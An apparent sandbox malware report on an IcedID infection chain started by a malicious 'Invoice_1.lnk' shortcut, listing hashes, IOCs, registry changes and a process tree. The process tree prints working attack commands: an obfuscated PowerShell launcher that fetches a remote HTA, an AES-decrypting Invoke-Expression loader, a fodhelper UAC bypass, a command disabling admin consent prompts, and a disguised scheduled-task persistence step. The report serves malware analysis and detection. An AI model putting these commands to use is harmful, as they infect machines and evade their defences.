Resubmissions
25-05-2022 19:16  220525-xy9rdacee9  10
23-05-2022 22:23  220523-2bae8ahfb7  10
23-05-2022 22:09  220523-12vneahef3  10

Analysis
- max time kernel: 1558s
- max time network: 1598s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 25-05-2022 19:16

Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: Invoice_1.lnk
  Resource: win7-20220414-en
General
- Target: Invoice_1.lnk
- Size: 2KB
- MD5: c00c67f3de031c5ae198ba0362b5dd01
- SHA1: 40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
- SHA256: d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
- SHA512: 4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad

Malware Config
Extracted
- https://conderadio.tv/09872574.hta
Extracted
- icedid
- 109932505
- ilekvoyn.com
Signatures
- suricata: ET MALWARE Win32/IcedID Request Cookie
- suricata: ET MALWARE Win32/IcedID Request Cookie

- Blocklisted process makes network request (4 IoCs)
  Processes: mshta.exe, powershell.exe, Rundll32.exe
  flow | pid | process
  7 | 3632 | mshta.exe
  12 | 3632 | mshta.exe
  23 | 4340 | powershell.exe
  33 | 4384 | Rundll32.exe

- Downloads MZ/PE file

- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: cmd.exe, mshta.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | cmd.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | mshta.exe

- Loads dropped DLL (1 IoCs)
  Processes: Rundll32.exe
  pid | process
  4384 | Rundll32.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Modifies registry class (11 IoCs)
  Processes: powershell.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ZDqcC.bat" | powershell.exe
  Key deleted | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command | powershell.exe
  Key deleted | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open | powershell.exe
  Key deleted | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell | powershell.exe
  Key deleted | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kywdT.bat" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings | powershell.exe

- Modifies system certificate store
  Processes: mshta.exe
  description | ioc | process
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | mshta.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | mshta.exe

- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe, Rundll32.exe
  pid | process
  2648 | powershell.exe
  2648 | powershell.exe
  4340 | powershell.exe
  4340 | powershell.exe
  1200 | powershell.exe
  1200 | powershell.exe
  2672 | powershell.exe
  2672 | powershell.exe
  4384 | Rundll32.exe
  4384 | Rundll32.exe

- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 2648 | powershell.exe
  Token: SeDebugPrivilege | 4340 | powershell.exe
  Token: SeDebugPrivilege | 1200 | powershell.exe
  Token: SeDebugPrivilege | 2672 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2672 | powershell.exe
  Token: SeSecurityPrivilege | 2672 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2672 | powershell.exe
  Token: SeLoadDriverPrivilege | 2672 | powershell.exe
  Token: SeSystemProfilePrivilege | 2672 | powershell.exe
  Token: SeSystemtimePrivilege | 2672 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2672 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2672 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2672 | powershell.exe
  Token: SeBackupPrivilege | 2672 | powershell.exe
  Token: SeRestorePrivilege | 2672 | powershell.exe
  Token: SeShutdownPrivilege | 2672 | powershell.exe
  Token: SeDebugPrivilege | 2672 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2672 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2672 | powershell.exe
  Token: SeUndockPrivilege | 2672 | powershell.exe
  Token: SeManageVolumePrivilege | 2672 | powershell.exe
  Token: 33 | 2672 | powershell.exe
  Token: 34 | 2672 | powershell.exe
  Token: 35 | 2672 | powershell.exe
  Token: 36 | 2672 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2672 | powershell.exe
  Token: SeSecurityPrivilege | 2672 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2672 | powershell.exe
  Token: SeLoadDriverPrivilege | 2672 | powershell.exe
  Token: SeSystemProfilePrivilege | 2672 | powershell.exe
  Token: SeSystemtimePrivilege | 2672 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2672 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2672 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2672 | powershell.exe
  Token: SeBackupPrivilege | 2672 | powershell.exe
  Token: SeRestorePrivilege | 2672 | powershell.exe
  Token: SeShutdownPrivilege | 2672 | powershell.exe
  Token: SeDebugPrivilege | 2672 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2672 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2672 | powershell.exe
  Token: SeUndockPrivilege | 2672 | powershell.exe
  Token: SeManageVolumePrivilege | 2672 | powershell.exe
  Token: 33 | 2672 | powershell.exe
  Token: 34 | 2672 | powershell.exe
  Token: 35 | 2672 | powershell.exe
  Token: 36 | 2672 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2672 | powershell.exe
  Token: SeSecurityPrivilege | 2672 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2672 | powershell.exe
  Token: SeLoadDriverPrivilege | 2672 | powershell.exe
  Token: SeSystemProfilePrivilege | 2672 | powershell.exe
  Token: SeSystemtimePrivilege | 2672 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2672 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2672 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2672 | powershell.exe
  Token: SeBackupPrivilege | 2672 | powershell.exe
  Token: SeRestorePrivilege | 2672 | powershell.exe
  Token: SeShutdownPrivilege | 2672 | powershell.exe
  Token: SeDebugPrivilege | 2672 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2672 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2672 | powershell.exe
  Token: SeUndockPrivilege | 2672 | powershell.exe
  Token: SeManageVolumePrivilege | 2672 | powershell.exe
  Token: 33 | 2672 | powershell.exe

- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes: Rundll32.exe
  pid | process
  4384 | Rundll32.exe

- Suspicious use of WriteProcessMemory (26 IoCs)
  Processes: cmd.exe, powershell.exe, mshta.exe, powershell.exe, fodhelper.exe, cmd.exe, cmd.exe, fodhelper.exe, cmd.exe, cmd.exe
  description | pid | process | target process
  PID 1792 wrote to memory of 2648 | 1792 | cmd.exe | powershell.exe
  PID 1792 wrote to memory of 2648 | 1792 | cmd.exe | powershell.exe
  PID 2648 wrote to memory of 3632 | 2648 | powershell.exe | mshta.exe
  PID 2648 wrote to memory of 3632 | 2648 | powershell.exe | mshta.exe
  PID 3632 wrote to memory of 4340 | 3632 | mshta.exe | powershell.exe
  PID 3632 wrote to memory of 4340 | 3632 | mshta.exe | powershell.exe
  PID 4340 wrote to memory of 4480 | 4340 | powershell.exe | fodhelper.exe
  PID 4340 wrote to memory of 4480 | 4340 | powershell.exe | fodhelper.exe
  PID 4480 wrote to memory of 4980 | 4480 | fodhelper.exe | cmd.exe
  PID 4480 wrote to memory of 4980 | 4480 | fodhelper.exe | cmd.exe
  PID 4980 wrote to memory of 2580 | 4980 | cmd.exe | cmd.exe
  PID 4980 wrote to memory of 2580 | 4980 | cmd.exe | cmd.exe
  PID 2580 wrote to memory of 1200 | 2580 | cmd.exe | powershell.exe
  PID 2580 wrote to memory of 1200 | 2580 | cmd.exe | powershell.exe
  PID 2580 wrote to memory of 3908 | 2580 | cmd.exe | cmd.exe
  PID 2580 wrote to memory of 3908 | 2580 | cmd.exe | cmd.exe
  PID 4340 wrote to memory of 1348 | 4340 | powershell.exe | fodhelper.exe
  PID 4340 wrote to memory of 1348 | 4340 | powershell.exe | fodhelper.exe
  PID 1348 wrote to memory of 2496 | 1348 | fodhelper.exe | cmd.exe
  PID 1348 wrote to memory of 2496 | 1348 | fodhelper.exe | cmd.exe
  PID 2496 wrote to memory of 3860 | 2496 | cmd.exe | cmd.exe
  PID 2496 wrote to memory of 3860 | 2496 | cmd.exe | cmd.exe
  PID 3860 wrote to memory of 2672 | 3860 | cmd.exe | powershell.exe
  PID 3860 wrote to memory of 2672 | 3860 | cmd.exe | powershell.exe
  PID 3860 wrote to memory of 1392 | 3860 | cmd.exe | cmd.exe
  PID 3860 wrote to memory of 1392 | 3860 | cmd.exe | cmd.exe
Processes
- C:\Windows\system32\cmd.exe
  command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice_1.lnk
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#oeE'}tV41O#>$zfkmQNMMGKcDTdJr=@(30802,30808,30797,30809,30790,30725,30797,30809,30809,30805,30808,30751,30740,30740,30792,30804,30803,30793,30794,30807,30790,30793,30798,30804,30739,30809,30811,30740,30741,30750,30749,30748,30743,30746,30748,30745,30739,30797,30809,30790);<#oeE'}tV41O#>$JxXPDMbtIHLsflxCnW=@(30766,30762,30781);<#oeE'}tV41O#>function najjGYpeT($gNCFLP){$KeafQvWRzpQ=30693;<#oeE'}tV41O#>$GDaRsn=$Null;foreach($jimJcuhW in $gNCFLP){$GDaRsn+=[char]($jimJcuhW-$KeafQvWRzpQ)};return $GDaRsn};sal pQtoDlBENz (najjGYpeT $JxXPDMbtIHLsflxCnW);<#oeE'}tV41O#>pQtoDlBENz((najjGYpeT $zfkmQNMMGKcDTdJr));
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\mshta.exe
      command line: "C:\Windows\system32\mshta.exe" https://conderadio.tv/09872574.hta
      signatures: Blocklisted process makes network request; Checks computer location settings; Modifies system certificate store; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ekPb = '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';$tPFOxUIgHD = 'U3FHZEtYZHBWcHZaQ09TR1JSell1ZmhUWktOemhReEc=';$CBMKxSfhg = New-Object 'System.Security.Cryptography.AesManaged';$CBMKxSfhg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CBMKxSfhg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CBMKxSfhg.BlockSize = 128;$CBMKxSfhg.KeySize = 256;$CBMKxSfhg.Key = [System.Convert]::FromBase64String($tPFOxUIgHD);$ddnEW = [System.Convert]::FromBase64String($ekPb);$kAbSPqMWQ = $ddnEW[0..15];$CBMKxSfhg.IV = $kAbSPqMWQ;$AUXAiVjEXOpkNt = $CBMKxSfhg.CreateDecryptor();$XPnBMtsJXxDfbSw = $AUXAiVjEXOpkNt.TransformFinalBlock($ddnEW, 16, $ddnEW.Length - 16);$CBMKxSfhg.Dispose();$GDDbozdXrwaw = New-Object System.IO.MemoryStream( , $XPnBMtsJXxDfbSw );$DuRHh = New-Object System.IO.MemoryStream;$qYlxsgnfBTqatvQswW = New-Object System.IO.Compression.GzipStream $GDDbozdXrwaw, ([IO.Compression.CompressionMode]::Decompress);$qYlxsgnfBTqatvQswW.CopyTo( $DuRHh );$qYlxsgnfBTqatvQswW.Close();$GDDbozdXrwaw.Close();[byte[]] $qDmVNkk = $DuRHh.ToArray();$liVTzN = [System.Text.Encoding]::UTF8.GetString($qDmVNkk);Invoke-Expression($liVTzN)
        signatures: Blocklisted process makes network request; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\System32\fodhelper.exe
          command line: "C:\Windows\System32\fodhelper.exe"
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" "
            signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\cmd.exe
              command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" *
              signatures: Suspicious use of WriteProcessMemory
              - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                command line: powershell.exe -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
              - C:\Windows\system32\cmd.exe
                command line: cmd /c del "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat"
        - C:\Windows\System32\fodhelper.exe
          command line: "C:\Windows\System32\fodhelper.exe"
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kywdT.bat" "
            signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\cmd.exe
              command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\kywdT.bat" *
              signatures: Suspicious use of WriteProcessMemory
              - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                command line: powershell.exe function tXIPlkvsktLPL ($hyUQNAjDGWycUo){ $mXzmkJZcEjqHY = 'Core update check'; $MAVXCzBKIjuPJeFnAJ = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $mXzmkJZcEjqHY; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @MAVXCzBKIjuPJeFnAJ -Force}; tXIPlkvsktLPL C:\Users\Admin\AppData\Local\Temp\1.dll
                signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
              - C:\Windows\system32\cmd.exe
                command line: cmd /c del "C:\Users\Admin\AppData\Local\Temp\kywdT.bat"
- C:\Windows\system32\Rundll32.exe
  command line: Rundll32.exe C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer
  signatures: Blocklisted process makes network request; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 8b591dabf3d165412ca5160b0fc9f7a0
  SHA1: 7f4003f64d280a98099a799b7303ab94adfea747
  SHA256: d90968baa89063686e83e4514b0b0341f703aefec3e00f63020a344763e92f60
  SHA512: 57aaed079e38c08f0fe05aec21c02c84a7ed80780e796a5944227d5f17439a1b4378004931512965445826457f30488ec8f173b199e0e5374d4828c43a7e8af5
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 331841fe482ffe8b1cc1509733d8ca67
  SHA1: 1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
  SHA256: 14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
  SHA512: 039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 331841fe482ffe8b1cc1509733d8ca67
  SHA1: 1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
  SHA256: 14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
  SHA512: 039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
- C:\Users\Admin\AppData\Local\Temp\1.dll
  Filesize: 718KB
  MD5: 5a0e570b13623c79c9261a8a2cc41f04
  SHA1: 10f6f208907d25f5ec39060a8576ed8387d42c0e
  SHA256: 3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
  SHA512: bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70
- C:\Users\Admin\AppData\Local\Temp\1.dll
  Filesize: 718KB
  MD5: 5a0e570b13623c79c9261a8a2cc41f04
  SHA1: 10f6f208907d25f5ec39060a8576ed8387d42c0e
  SHA256: 3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
  SHA512: bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70
- C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat
  Filesize: 343B
  MD5: 8ca0985471c9c17826fab97b90f90c2e
  SHA1: 6dfd1040096a2215be242e4392d7a2768d067f10
  SHA256: f9a6e829c29a8411f88db8a26edc1fafe70c64b0df651ad359ca944b14a17781
  SHA512: 539d65d7e7676e3a030de37e1339c2ddb0077db3242d42e6497c66f1bc8f9fc60a00150d8c29ade40c6845e1733f4f2d4cb9f830d09969676f1d24834767cefb
- C:\Users\Admin\AppData\Local\Temp\kywdT.bat
  Filesize: 692B
  MD5: a9338ee7f2e9643871e016eda0ecbe1f
  SHA1: 66c6dc3bcd948645774778263e7c8069e340e704
  SHA256: c3eecc22513eb86b258dc0bfe97a599c9c5673d86fb2d2b286a88d113f076813
  SHA512: 7cb76b9cfdb41e3640bbec245324ba4c05757c84d0dec7d36320ce6836a2a7868727a7add4b0b49e9126f6b3233d18c2e31649ef4015769248f6101211f4853f
Memory dumps
- memory/1200-143-0x0000000000000000-mapping.dmp
- memory/1200-144-0x00007FFE0EA20000-0x00007FFE0F4E1000-memory.dmp
  Filesize: 10.8MB
- memory/1348-146-0x0000000000000000-mapping.dmp
- memory/1392-154-0x0000000000000000-mapping.dmp
- memory/2496-147-0x0000000000000000-mapping.dmp
- memory/2580-142-0x0000000000000000-mapping.dmp
- memory/2648-134-0x00007FFE0F180000-0x00007FFE0FC41000-memory.dmp
  Filesize: 10.8MB
- memory/2648-130-0x0000000000000000-mapping.dmp
- memory/2648-131-0x0000022D7F520000-0x0000022D7F542000-memory.dmp
  Filesize: 136KB
- memory/2672-150-0x0000000000000000-mapping.dmp
- memory/2672-153-0x00007FFE0EA20000-0x00007FFE0F4E1000-memory.dmp
  Filesize: 10.8MB
- memory/3632-132-0x0000000000000000-mapping.dmp
- memory/3860-149-0x0000000000000000-mapping.dmp
- memory/3908-145-0x0000000000000000-mapping.dmp
- memory/4340-138-0x00007FFE0EA20000-0x00007FFE0F4E1000-memory.dmp
  Filesize: 10.8MB
- memory/4340-135-0x0000000000000000-mapping.dmp
- memory/4384-157-0x0000000180000000-0x0000000180009000-memory.dmp
  Filesize: 36KB
- memory/4480-139-0x0000000000000000-mapping.dmp
- memory/4980-140-0x0000000000000000-mapping.dmp